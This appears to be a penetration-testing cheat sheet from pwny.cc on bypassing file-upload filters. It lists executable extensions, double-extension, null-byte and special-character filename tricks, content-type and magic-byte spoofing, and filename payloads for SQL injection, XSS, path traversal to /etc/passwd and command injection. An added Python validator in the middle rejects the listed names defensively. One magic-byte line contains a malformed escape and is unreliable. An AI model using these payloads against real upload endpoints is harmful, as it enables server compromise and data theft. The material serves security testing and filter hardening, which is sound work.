pwny.cc
Insecure File Upload

Default extensions

PHP

.php
.php2
.php3
.php4
.php5
.php7
.pht
.shtml
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
.htaccess

ASP

.asp
.aspx
.cer
.asa
.ashx
.asmx
.axd
.cshtm
.cshtml
.rem
.soap

JSP

.jsp
.jspx
.jsw
.jspf
.jsv
.wss
.do
.action

Perl

.pl
.pm
.cgi
.lib

ColdFusion

.cfm
.cfml
.cfc
.dbm

Flash

.swf

Erlang Yaws Web Server

.yaws

Bypasses

Double extensions

file.jpg.php
file.php.jpg
file.php.blah123jpg
file.png.php
file.png.Php5
file.php%00.png
file.php%0d%0a.png
file.php%0a.png
file.php\x00.png

Null byte

file.php%00.gif
file.php\x00.gif
file.php%00.png
file.php\x00.png
file.php%00.jpg
file.php\x00.jpg

Special characters

file.php......
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.pHp5....
file.%E2%80%AEphp.jpg
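
Added example, not part of the original page: a server-side filename check in Python that rejects every name in the double-extension, null-byte and special-character lists above by decoding first and then requiring exactly one allow-listed extension. The function name `check_upload_name` and the image-only allow-list are assumptions made for the illustration.

```python
import unicodedata
from urllib.parse import unquote

# Assumed policy for this example: an image-only upload endpoint.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Names taken from the lists above (backslashes escaped for Python).
BYPASS_NAMES = [
    "file.jpg.php", "file.php.jpg", "file.php.blah123jpg", "file.png.Php5",
    "file.php%00.png", "file.php%0d%0a.png", "file.php\\x00.png",
    "file.php......", "file.php%20", "file.php%0a", "file.php/",
    "file.php.\\", "file.", "file.pHp5....", "file.%E2%80%AEphp.jpg",
]

def check_upload_name(raw_name):
    """Return (accepted, reason) for a client-supplied filename."""
    # Percent-decode a bounded number of times so nested encoding
    # (such as %2500) cannot hide a control byte from the checks below.
    name = raw_name
    for _ in range(3):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    else:
        return False, "still encoded after 3 decoding passes"
    for ch in name:
        # Cc covers NUL, CR and LF; Cf covers U+202E (right-to-left override).
        if unicodedata.category(ch) in ("Cc", "Cf"):
            return False, "control or format character U+%04X" % ord(ch)
    if "/" in name or "\\" in name:
        return False, "path separator"
    # Windows strips trailing dots and spaces, so "file.php......"
    # would be stored as "file.php".
    if not name or name != name.strip(". "):
        return False, "leading or trailing dot or space"
    parts = name.split(".")
    if len(parts) != 2:
        return False, "expected exactly one extension"
    if parts[1].lower() not in ALLOWED_EXTENSIONS:
        return False, "extension not on the allow-list"
    return True, "ok"

if __name__ == "__main__":
    for sample in BYPASS_NAMES + ["holiday.PNG"]:  # last name is constructed
        print(repr(sample), check_upload_name(sample))
```

Storing the upload under a server-generated name outside the web root removes the dependence on the client-supplied name altogether.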

Content-type Bypass

#Original name but different content-type
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/png

Magic bytes

#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a
GIF: GIF8

Triple equal

/?file=shell.php <-- Blocked
/?file===shell.php <-- Bypassed

Filename Vulnerabilities:

#Time-Based SQLi Payloads
poc.js'(select*from(select(sleep(20)))a)+'.extension

#LFI Payloads
image.png../../../../../../../etc/passwd

#XSS Payloads
'"><img src=x onerror=alert(document.domain)>.extension

#File Traversal
../../../tmp/lol.png

#Command Injection
; sleep 10;